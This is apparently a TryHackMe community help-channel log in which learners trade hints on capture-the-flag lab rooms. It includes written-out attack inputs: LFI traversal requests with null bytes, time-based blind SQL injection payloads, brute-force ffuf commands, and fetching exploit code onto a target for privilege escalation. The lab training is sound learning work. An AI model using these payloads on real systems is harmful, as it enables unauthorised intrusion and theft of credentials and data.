I was trying to do the ohsint room but have been stuck on the "ssid of the wap" question for about half an hour. I have the bssid and used wigle.net to find the city but have no idea what to do next. Can someone give me a hint?
Oh, did not do such a thing, lemme figure it out a little bit more, thanks
Thank you @glass eagle
Gave +1 Rep to @glass eagle
Thank you for your assistance! Nudging me towards the right tool / methodology was just what I needed to figure this out. After checking the network tab in the developer tools I was able to formulate the right answer.
Gave +1 Rep to @left thunder
'LinPrivEscNFS' -> task 11... I can't run the mounted NFS file on the target machine (||I made a 'mount' to the attackbox... I wrote a C++ priv. esc. file. I ran it on my attackbox, I got a root shell, but I can't go into that same mount folder on the target machine and run the C++ code.||) Any tricks?
Looking for help with File Inclusion Task 5 Question 1 about Lab 3
Give Lab #3 a try to read /etc/passwd. What does the request look like?
I input my request which succeed in getting the passwd
/lab3.php?file=include("languages../../../../etc/passwd%00
and it is incorrect. I don't understand what the question is asking for if not that.
you forgot an / between languages and .../
Are you still looking for help?
Well, your LFI seems to be more complicated than it has to be, therefore the answer doesn't work
Btw that request is not even working, I just tried it.
What did you try so far?
Think about how you could read certain files with base64 SUID
lol no reason to feel stupid
Gave +1 Rep to @woven perch
np
Thanks I figured that might be it. I know what area to work in.
Gave +1 Rep to @left thunder
https://tryhackme.com/room/winprivesc task 6: how do I transfer the executable file to Windows? wget is not working
It should work, what is the error message? Do you have a SimpleHTTPServer on your AttackVM?
i got it done, but i am stuck at this question
What would be the name of the executable you would place in that folder?
The program is looking for an .exe in all the paths!
And if, for example, you wrote Program Files without quotes instead of "Program Files", then the program will look for Program.exe (nothing there, ok), Files.exe ... and so on
Hi everyone, can anyone help me in the File Inclusion room of TryHackMe?
I am having a problem with the last challenge of that room
which part specifically?
Hey guys, did someone finish the room FileInclusionVM from the Jr Pentester Path?
Yes
I'm really stuck at Task 8 Flag 2 & 3
They don't depend on each other, so you can do them in either order
Yeah that is what I did, I tried 2... I was stuck and tried the 3rd afterwards... but didn't understand either
- change the values multiple times. understand what you do and what the webpage does
You can't assume it will do what you want. Pay attention. I like to use a long random word like so it's obvious
For 3, think if there are other ways to GET the information you want
Look also at the hints and take a break away from the computer, it helps to get a fresh look at a problem
You are so lovely mate, thanks. I understand the 2nd flag and I found it
now let's go for third
[ROOM COMPLETED] Howdy, anyone in here completed the "Retro" room by dark? I'm on the box as "iusr" via a webshell->powershell revshell, but I'm pretty sure I'm stuck at this point. I'm not one to usually ask for help, but I think I'm missing something lol. Can't seem to be able to find any dirs that "iusr" has perms to write to, and I can't read any normal users' home dirs. Was trying to move forward in my privesc here but I can't even get a directory where I could write any files to lol. Was going to download winPEAS via Invoke-WebRequest, and my local server gets a hit as 200-OK but the files are not on the target lol. Also noticed that SeImpersonatePrivilege is enabled on the box so I'm pretty sure I can just run PrintSpoofer on there and get NT AUTHORITY\SYSTEM but again, I can't write to any directories that I know of. I'm probably missing something stupid. Any hints?
This is where I'm at lol.
[SOLVED] Hey everyone, new to tryhackme... trying to finish up the exploiting SMB portion of the networkservices room. I am stuck at the last part. I have the id_rsa file and changed the permissions. Now it says to work out the username, then use the service and key to connect to the server. All I get is "connection closed by the server" messages. Does this mean I'm doing something wrong, or just haven't figured out the right username yet?
So, when I originally tried to log in as Wade it didn't work for some reason, but after messing with it again I got it to work. So I'm assuming that the revshell method was supposed to be a dead end; or I just couldn't figure it out. But I'm here now; let's see if we can finish this off.
Are you trying to connect from the attackbox to the target or from your own machine?
From the attackbox
What's the full command you are trying to ssh into the machine? Also make sure you are using the correct IP
Bro, I have a headache because of this 3rd flag - fileinclusionVM
Have you gotten past the filter?
Using:
ssh -i ~/id_rsa user@targetip
okay. use a long random word to see if it's changing what you expect.
With POST method you can bypass filters, but then still I got stuck bro :/
What's under "title" next to where the target machines IP is displayed?
All I get back is "connection closed by ..."
Polosmb3
right. so when you change your request, see what it actually looks up.
Could you send me a screenshot of that in a DM?
Sure
And if you receive a new error it doesn't mean you failed. It could be progress
Yeah I saw the error, it searches a default php folder with our input, like: {myinput}.php
should I actually just bypass that php?
okay. so you need to terminate the rest of the line
Remember in task 5, you had to work with the null byte
Anything yet?
Still not working
Oh I found it @glass eagle xD
it was just a stupid typing error
There you go. Devil's in the details
hahahaah Thnx bro
Thank you @glass eagle
Gave +1 Rep to @glass eagle
I am doing the File Inclusion room of the Junior Penetration Tester path
Can anyone help me to solve challenge 3?
I have been trying to figure it out for the last few hours but am stuck here
Have you followed the hints for that challenge?
yes
I checked the hint but was not able to understand it completely
can you provide some hints
I tried numbers and symbols
and encoding
nothing worked
and I am also trying to figure out what's the purpose of cookie THM=Guest
in this challenge
I don't remember challenge 3 having a cookie as a part of it. Are you in the correct challenge?
yes I am in correct challenge
I just went to challenge three and it does not have a cookie.
Anyways for challenge 3 you should lookup $_REQUEST and the types of input it can take. You can't always GET what you want.
input mechanisms is probably better wording
I'm doing Task 3 (Brute Force) on the Authentication Bypass for the Jr Penetration Tester path and can't get any results, I'm using the file generated in task 2 (it's populated with the names) and verified I'm properly typing the command. Could anyone point me to anything I may be missing please?
1 sec. let me look at my notes
when looking at your valid_usernames. did you keep the entire output of the previous command, or make a list of ONLY the usernames?
I trimmed it down to only the usernames
Do you get an error from ffuf?
I just loaded up the VM and ran it myself
Did you verify the location of the password file? It wasn't where the example command expected
?
This is the only output I got ":: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::"
I did verify the path to the file was correct.
Send me a screenshot of your command and result
what room?
You need to specify the wordlist for W1
type /usr/share/seclists/Usernames/names.txt
The 3 names do need to be in the valid_usernames.txt (which you got from the previous task)
You don't need the 10mil. Use best1050. It will be faster
Yes, don't use 10 mil because you're going to wait so long
sec
use the best1050.txt file
best1050 yields the same output
@barren bramble maybe cat your valid_usernames.txt and post the output, the rest seems to look like it should
well, screenshot
Thanks @glass eagle for the DM help, got it to work now after rebuilding the valid_users file.
Explaining the -s option for ffuf would really benefit that room I think
Gave +1 Rep to @glass eagle
user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms
what is the IP address of the last router/hop before reaching tryhackme.com?
What would be the answer?
In my knowledge, It should be 100.92.9.118
But that's not right answer
Can anyone tell me the answer with the reason?
SQL Injection Task 8 blind SQLi: referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- gives no response. I read the other task 8 posts. Any other hints?
The 'u%' is just a reminder of what you should be doing, not the first thing to try
"u" should be replaced by something similar you found in task 3
You did the task 8 ?
Yes, it takes time but you'll get there!
task 5 gave me a hint of what the database name is. When I put it in it takes 5.001 seconds but doesn't return anything. I manage two SQL servers with 30+ databases and am used to writing select script. Other than changing u do I need to modify any other part of it. the referrer script doesn't return tables. I looked at task 3 and tried many SQL scripts to retrieve tables and get errors. This is the last task I need to complete.
In the gatekeeper room , the script firefox_decrypt just doesn't work. I tried my best, but can't get it to work. Any ideas or workarounds?
So you are at task 8, right? If yes, you are not supposed to get anything back except for a true or false which is indicated by the 5 seconds delay. delay = true, no delay = false
That's normal that it does not return anything. The fact that it sleep for 5s means that you have something working
I realize that but I get no response. I went on to the rest of the Jr. Pentest sections. Seems like some sections are written better than others.
Well yeah, you need to really spend a lot of time on SQL
I have two SQL servers and 30+ databases at work I write scripts for. I have Mariadb on my servers at home I write databases on.
Yeah but it's still specific
Complete Beginner path, need help with Network Services module Task 4, the very last question, figuring out the password? I've been stuck on this for a while now. I think I skipped a room where we learn to decrypt rsa_id or something. Thanks
You don't need to decrypt the file. Copy the file to your machine and use it with ssh.
ssh -i <keyfile>
also don't forget to chmod 600 it
I did that, and the chmod 600. Then it appears clear, and I go to log in with ssh and I get keep getting asked for a password and don't know how I'd get the password (that's why I thought it had to be decrypted) OK wait no tried a different command and got logged in correctly, so thx for the tiny hint!
Hey guys, I am on the linux privesc task(jr pentester) where I gain root shell access on a reverse shell through a cronjob. However, once the script executes and I get a connection on the reverse shell(attacking machine), it connects as the unprivileged user(karen) instead of root. can you help me out as to why this happens
I just ran that task again. Set the correct permissions (600) and owner (root.root) on the id_rsa. Then you can ssh -i <id_rsa_file> and login with the correct username
if you use the correct username with the file, it should work. you can make guesses from the information you know. but the id_rsa.pub is typically signed to user@server. so check that file
I got it, thanks so much, my sticking point was being unfamiliar with the -i switch with ssh, noted now!
Gave +1 Rep to @glass eagle
Some rooms i do in 20 minutes. Ones like this one item takes hours. The idea is to learn the material not go on a scavenger hunt. The material should be concise to how to complete tasks
can I get in on this?
Here's what my valid_usernames.txt looks like
and I've tried the best1050.txt password list.. Still getting:
this output with these errors. what am I doing wrong?
Your file is not right, it has to be 1 username per line without anything else, in your case without the status code, size etc.
I thought I tried that last night (late). Maybe I didn't save. I'll try again. Thx.
Is the cronjob being run by karen or by root? That's strange
to post screenshots and all that shebang, you need to verify btw :P
!docs verify
Next time use dirbuster.py python file from github
I'm not the room creator if you are not happy about it don't do Cybersec. Some rooms are simple some are not. When you do a pentest you are not always finding things right away
@prime elk @obtuse hill what you need to do here is to accept that as the regular murphy user you cannot have read access to the /etc/shadow file,
[-] Post aborted due to failure: no-access: Shadow file must be readable in order to dump hashes
so what you need to do here is to raise your privileges by using a command like sudo cat /etc/shadow
then copy & paste the previously used SSH password
for Linux users this might be so obvious that someone might forget to mention that for non-Linux users
Okay I will try it.
Can I get a hint for command injection task 5
Guys, on what path should I run the whoami payload in task 5 command injection please?
What you mean with "on what path" ?
@left thunder Hi Fontaene,
I just got the first question by running a payload in the diagnoseit machine.
The second question asks for the flag in /home/tryhack.me/flag.txt
I don't know how to run a payload on that
So how would you display the flag if you are on your own terminal? Like what command would you use to display the flag?
I would open the attackbox and run curl with a http()whoami @left thunder
Mh? How would whoami display the flag content? I mean if the flag.txt is on your local machine, what would you enter to get the content of that file printed in your terminal?
@left thunder I think that half a path is confusing me. I would use my local ip or the path
Have you done the linux fundamental rooms?
I have not. I just started the junior pentest straight away. But I'll go there and read
Yeah, I don't want to be rude or offensive or something, but I think you are missing some Linux basics, so giving the Linux fundamentals rooms a go would for sure help you on that task.
@left thunder great, thank you, no worries, I'm entry level
I appreciate your help. I know you didn't design it. Took 4 hours to work through the blind sqli configuration. Some pages lay out the methods better.
Give +1 Rep to @MadzBlind
Hi everyone, So I am stuck on linux privesc task 11 (NFS)
I see there are 3 mountable shares on the target machine, out of which I cant "cd" into 2 of them. so the only genuine one is /tmp
So I mount the /tmp drive on the attacking machine, create the binary and make it executable, give it SUID permissions and root ownership. However, these files don't show up on th
For the NetSec Challenges, can you specify what port you want instead of protocol name in Hydra?
trying to re-direct to the non-standard FTP port
I've tried the -S switch but it's not taking it for some reason
ohhhh gotcha
thanks! @burnt rivet
Gave +1 Rep to @burnt rivet
Hey people, I'm trying to complete LFI #2 on inside File Inclusion in the Junior Penetration Tester Course and I accomplished the task, the one thing I can't seem to find is the name of the function in the second question, please help, it is something with 17 characters
It's mentioned in one of the previous tasks
I've tried everything I believe but I'll keep at it
I got it now, I would never reach it
Thanks everyone
guys I am stuck on an authentication bypass task4 for hours any help, please??
Same thing here. I tried to get the binary using a python web server but the file comes owned by karen and when executed only gives user karen a bash shell. I tried mounting on the other shares but still, files are not synchronized
took about an hour to synchronize, in this time I started going back to everything linux priv escalation, LOL. Now that it synchronized, got it to work.
Hi! Is there anyone that can help me with SQL Injection lab from the new Jr Penetration Tester path? I have been stuck for hours
I suggest you ask the question you have straight out, as in case someone can/is willing to help, he will reply and therefore you will get your answer faster than first asking if someone can help
Sure Thanks!
I need help for the SQL Injection Room from the new Jr Penetration Tester Path. I'm stuck at task 8. The room is really buggy, it gives a lot of false positives, that's why I am unable to enumerate columns from the DB
Hello, I need a hint on the ccpentesting room Section 7 - Final Exam @ https://tryhackme.com/room/ccpentesting
Using nmap I found out there's a SSH and Apache services running on the machine, using the browser I saw that the apache server is running the default page, scanning with gobuster has discovered a few pages with access denied codes, but there's a /secret folder with code 301 that just leads to a blank page..
What do you mean by false positives? What have you tried?
I already used sqlmap cause I went crazy. Time based blind SQL injection from task 4 activates if you put an underscore while enumeration and using sqlmap gave the correct data. Example: I use "UNION SELECT SLEEP(5),2 WHERE database like 'sql_%';" and it triggers the vuln. I spent a lot of time stuck at this with the idea stuck in my head that the DB name started with sql_ and it was wrong.
I can also put 'sql_____________' and still triggers the vuln but if I try any other letter, number or symbol, apart from the underscore, it wont activate
I have the db name and the table name, but it's happening again with the columns
I don't know about sqlmap, but you can do the whole task within the page of the split screen. So I'm not sure what exactly you are stuck on, if you use admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- and it's not sleeping 5 seconds, means that the database name doesn't start with u . So if you are going through all the letters and special characters. Like 'a%' , 'b%' and so on, you should be easily able to figure out the database name and so on. Also as far as I remember, there is no database starting with sql so if you try admin123' UNION SELECT SLEEP(5),2 where database() like 's%';-- it shouldn't sleep.
Sorry, I meant level 4 from task 8, the only "challenge" that doesn't explain every step.
I know, but that is the problem, the room is buggy, cause as I said I used sqlmap and I already got the real name of the DB, but when I try the real name with the payload directly on the webpage, it wont trigger, it will only trigger with an underscore
For example, let's imagine that I already know that the name of the DB is 'admin'. If I try and send "admin123' UNION SELECT SLEEP(5),2 where database() like 'admi%';--" it won't trigger. But if I do "admin123' UNION SELECT SLEEP(5),2 where database() like 'adm_%';--" it activates
So could you do me a favour and try without sqlmap on the challenge webpage admin123' UNION SELECT SLEEP(5),2 where database() like 's%';-- and let me know if it's going to sleep?
It does, I already extracted the real DB name and the table name that I want to extract, but every time I try to do it manually, it does the same. Like on the DB name, it always did that not vuln trigger with "admin123' UNION SELECT SLEEP(5),2 where database() like 'sql%';--
So I managed to get db and table name, but now the webpage is doing the same with column enumeration and I can't move
Oh hold on, I'm stupid, it actually starts with s xD. So if it's triggering with 'sql_%' it means there is an underscore in it. But as you already figured out the database name, I don't know why you are going to try admin123' UNION SELECT SLEEP(5),2 where database() like 'adm_%';-- as that's only going to enumerate another database, instead of trying to enumerate the tables of the sql database you previously found.
Sorry, that was an example so that I wont spoil anything
Let me send the real query that I am using
Ye
admin123' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_*' and TABLE_NAME='use' and column_name like '%';-- -
The asterisk in tableschema is just for spoiler purpose, right?
table name is wrong, grabbed the font change with some * symbols
Yep
sqli_****
use**
Now, if I do admin123' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_' and TABLE_NAME='use' and column_name like '_%';-- - it does trigger, even if I put 100 underscores, but it doesn't work with any other letter or symbol
Okay, I don't know why it's going to trigger with the underscores, I had an issue with underscores while enumerating the database name as well, but, if you keep on adding 'a%';-- , 'b%';-- and so on, you should get a positive response for one of the letters. Not sure if you really also add the - at the very end of your query or if it's just a typo in discord, but if you do, I would get rid of that
And that it's going to trigger with using only '%';-- is alright.
Thanks for the help buddy! I restarted two times the machine and it finally worked, room completed!
Again, thanks for the help
Alright
Hello all, who can I ask for help, I can not understand how to up privilege, I found the binary itself, but I can not understand how it works, task Blog
Im stuck in the File Inclusion room, Challenge, Question 3.
All fullstops and "/" are filtered, so I have no idea how to get to ../(...)/etc/flag3.
The hints said that I should research $_Requests in PHP, because some things aren't filtered, but for the life of me I can't find any good documentation on it that includes this.
What can I do now?
Combination of filter bypass, which is explained in a previous task and request method. https://www.w3schools.com/tags/ref_httpmethods.asp
I've tried filter bypass with "....//", but that doesn't work. The individual "." and "/" are replaced, so I can't duplicate it that way. As for the request methods: I changed this from GET to POST and now it worked. Thanks a lot! I've read through the differences between GET and POST though, and I don't quite understand how changing this would change the filter. As far as I can remember "/" is part of ASCII, right?
New issue arose: when trying to circumvent the appended ".php" with a null byte, I realized that the null byte is just taken into the search. So the query goes as follows: ".../etc/flag3%00.php". How do I get the null byte to actually "work"?
Check your "real" request in the network tab of the dev tools for example and see what happens.
Oh man, I did that and then edited my request with Burp... sometimes I wonder why I don't think of doing these things. It's getting really annoying because it happens so frequently. Thanks a lot though!
give it time :)
Nobody starts off being great at this stuff ^-^
That is true, but I am "already" 0x8 and still do things like this haha. I end up getting done by looking up writeups sometimes, but there are no writeups for actual bug bounty hunting
I'm also 0x8 and get stuck a lot on things that I feel like I should already know. Looking at write-ups isn't a bad thing at all. You see how other people do things and gives you new ideas. What's important is to try to understand what's going on and why it works :)
That is a good point. I generally already understand what they are doing in the write-up, I just don't think of actually trying it. I'm generally not really stuck because of a lack of knowledge, but I just have no clue what I should try to solve the challenge.
Follow along with what they do in the write-up, learn how it works and then try to do it again but on your own. After doing this a lot (and I know it can be very demoralising), you'll definitely notice an improvement. Just go back to rooms on THM for example that you remember struggling with in the past and you'll see :)
That's actually a really good idea, I'll do that once I'm back
Thanks for the advice!
you're very welcome 
Room Linux PrivEsc - task 5, but not able to transfer exploit to target machine
anyone please help
tried scp
wget
curl
getting permission denied
$ wget http://10.10.131.130/37292.c
--2021-10-31 11:09:20-- http://10.10.131.130/37292.c
Connecting to 10.10.131.130:80... connected.
HTTP request sent, awaiting response... 405 Method Not Allowed
2021-10-31 11:09:20 ERROR 405: Method Not Allowed.
$ curl htttp://10.10.131.130/37292.c
-sh: 5: curl: not found
$ wget http://10.10.131.130:4444/37292.c
--2021-10-31 11:25:15-- http://10.10.131.130:4444/37292.c
Connecting to 10.10.131.130:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied
Cannot write to '37292.c' (Permission denied).
$
Retry in /tmp folder maybe
Make sure you get the file to a folder you have write permissions for. Try to touch any file to test write permissions. Also a good idea to compile code on your Kali/AttackBox since gcc or python will not always be installed and you may not be able to install them either.
thanks
npnp
not able to connect to target machine
Task 6 Privilege Escalation: Sudo
connection error
you might as well forget about sudo in this and all upcoming tasks in this room. Try the other GTFObins options. Now you have to scratch head harder.
thanks
got you
Hey there! I'm stuck on Task 8 in the SQL Injection room. I got the table schema but I've tried everything for the table name, but I am not getting a delay
What's the command you try?
https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sql' and table_name like '%';--
In the %, I tried inputting every number, char and alphabet
You have not enumerated the correct database name, so therefore this is not going to work.
Hi, I'm also stuck on Task 8 in the SQL Injection room. I found the first 4 characters of the password but couldn't find the next one.
have you checked if that is the password?
looking at notes
yeah. Mine shows admin with a 4 char password
That has multiple pages that keep progressing to the next challenge, right?
And you pulled info from sqli_four, so it's not the same pw as the previous task?
yeah, It's not the same password as the previous task
PM me with your un/pw
I got the delay for the first 4 characters of the password for admin. Tried logging in but it didn't work
thanks @glass eagle
If anyone finds this message looking for help in the future: the underscore character is NOT in the password. In database syntax _ may be used as a wildcard character. This led to the confusion here
Smashed my head against the proverbial wall for far too long about this. your tip got me sorted in 5 min. TYVM.
Who is the author of Exploit-DB?
Johnny Long should be the answer
but it is not
any hints?
At the end of the website there's " Exploit Database by [...] " it will be your answer
If you've already done that, try running it as "/usr/bin/mysql"
I tried that in the screenshot, I'll try your method
It didn't work.
No such file or directory
sudo apt reinstall default-mysql-client ?
If I look where my mysql client is coming from, it shows mariadb-client-core
$dpkg -S /usr/bin/mysql
mariadb-client-core-10.5: /usr/bin/mysql
could try installing that
Is that your attackbox from TryHackMe?
I'm booting up an AttackBox. This was a local rpi/kali
I thought the AttackBox would have it installed already.
It doesn't; it says in the task to install that default-mysql-client
It's possible apt didn't install it if the repo was out of date
run
sudo apt update -y
sudo apt install -y default-mysql-client
After I ran those 2 commands, it installed and was at /usr/bin/mysql
update?
Update and then install worked, thank you @glass eagle.
I am having problems with : Jr Penetration Tester Room - Authentication Bypass - Task 3 - Brute Force. The problem is that no valid userid/password is reported. Instead all I get is 4 lines similar to Progress: [40/400] Job 1/1 0 req/sec Duration 0:00:00
Has anyone else successfully completed that task?
Check your username wordlist. It should only contain 1 username per line and not the username with the status codes and so on. So you might have to create it manually.
ahhhh that's probably the problem. I will try that... thanks!
We were just having talks about this earlier. There may be special characters in your file. "cat -A <FILE>" will show hidden characters. Make a new file instead of trying to trim the existing one
will do... thanks
Can anyone help me with this question? This is Task 12 Linux Modules.
On Linux Fundamentals 1, having trouble answering which directory contains a file, as all of them do. I feel like I'm misunderstanding the question.
Any help would be amazing
there is no directory named tryhackme
@burnt rivet
Task 3 had me open the machine; I thought I was supposed to be working in it the whole time
smh thanks man, I was pulling my hair out, I feel quite stupid
I only saw the option to open the AttackBox
Neither here nor there though, thanks again for your help bro
I was losing it lol
Hello, I feel really dumb, but what is the answer to this?
Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Can you tell me the room name pls?
Windows Fundamentals 1
It is Windows Fund 1
alr gimme a second
@white salmon action center
AM I THAT DUMB
LMAO
did it yesterday
I know all the stuff like desktop, taskbar etc.
I did it a bit ago too and I just find windows annoying
but this shit is confusing
Lmao, I now use Windows 11
I just use linux for everything (except this chromebook for school and my phone)
Cool
There would have been a link for a brief description of the notification area; if you had checked that documentation you would have gotten your answer as well, so it might be a good thing to check out such attached links
Still on Windows Fundamentals?
Yeah lmao :((
Task 6? Did you see it in Local User Manager (lusrmgr.msc)?
wdym?
Start menu > Run lusrmgr.msc will load a panel with accounts on the machine
Yes i did that
On the left side, click on Users. Then the middle pane will populate with users on the machine
did that
The entry with a "full name" entry should be the answer
U mean my user name tf
there are 5 accounts listed. 4 of them are standard windows accounts (admin, guest, default, wdag....)
Yeah
You logged in as 'administrator', so the other account is the 5th account
get it?
It's not always obvious when learning something new. Sure, drop into voice chat
Resolved. lusrmgr opened on his PC and not the connected Windows VM
?
Just following up, so other people see you finished the task, or if other people use the search they can see what the solution was
What is the keyboard shortcut to open Task Manager?
I know a lot of shortcuts, but which one do I type?
Read the article they list in the task. It's very common for rooms to ask you to research information yourself
They also want to teach you how to find the information, not just copy/paste info from the task
Oh
You don't have to read all of them, but if the information wasn't obvious in the task, see if any of the related articles could help find the answer.
Found it
You're only on day 2. There's a lot to learn. Don't get frustrated when you're still getting familiar
Ok
Hi, I am stuck in the room "Burp Suite Repeater" at the question
See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs.
I only get error 404.
Does someone know why?
Most probably because you are not providing the correct input. Read the hint carefully.
At first I tried to enter a value larger than the range of an int.
I tried the same for long,
and later I tried to input strings
and then random characters like "<" or "|"
but nothing. Are my inputs wrong?
Yes, there is still an input in the hint you didn't try, from what you explained here.
Not a problem
I had the same problem but with reuse of script I forgot to remove Bs from retn variable. With offset 0 and empty retn variable it gave the right offset.
Yeah it's solved now. Thanks.
Hello there. I am doing the FireEye Redline room > Task 6. The problem is I tried many ways but I wasn't able to create the IOC report successfully.
Hey, I'm working on Subdomain Enumeration task 6; the thing is it doesn't show the 2 results it should, it filters out everything instead
What's the ffuf command you've used? What output did you get?
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs 472
hmmm
The other command mostly showed 472 size
I don't remember what response size could be used for doing the filter
but you might want to check what the response size for invalid vhosts would be
then use that as a filter so that you only get valid vhosts in your output
If I run it without the filter I see this
ok... starting the room up now to see what the problem is
appreciate the help :>
the response status codes you get shouldn't be 405
have you added the machine's IP address into the command?
yeah
is the machine IP address you put in the command correct?
It's displayed in green
I make mistakes like this sometimes and it always helps to double-check your work
at the top of the page
right?
and also in the terminal
It's the name of the machine
At the very top of the AttackBox it also says its IP
so I'm pretty sure I'm typing in the correct one
ohhh I see what the problem is
You're running ffuf on the AttackBox
The AttackBox is a machine for you to run commands against other victim machines you spin up in THM
It itself isn't a victim machine
yeah
Lemme try
when you've started that machine, you should see this banner
the IP address in the red box is the IP address of the victim machine for you to do vhost enumeration on
AAAAH
I see
The IP is different
okok I'll start the machine and check
worked now
Thanks a lot for the quick response <3 @ivory cypress
Hi, can someone help on the Clowned room on TryHackMe?
https://tryhackme.com/room/clownedz2 , this one
I think everyone will struggle because that is a private room that isn't released to the public
It also looks like a machine for a CTF
How am I supposed to do that? Can someone explain it to me?
You might want to add what room and what task you are on, otherwise it's hard to help.
oh yeah, sorry
intro to LAN, task 1, the final question
I'm French and I'm not so good in English, so I don't understand some sentences in the questions
But you can see the interactive lab in split view, right?
this?
Yes
but at the end of the lab, it doesn't give me any flags
OH NO
I found it
I don't see that I can cut the network
Ye, you have to go through the whole interactive lab, at the end you get the flag
ok thx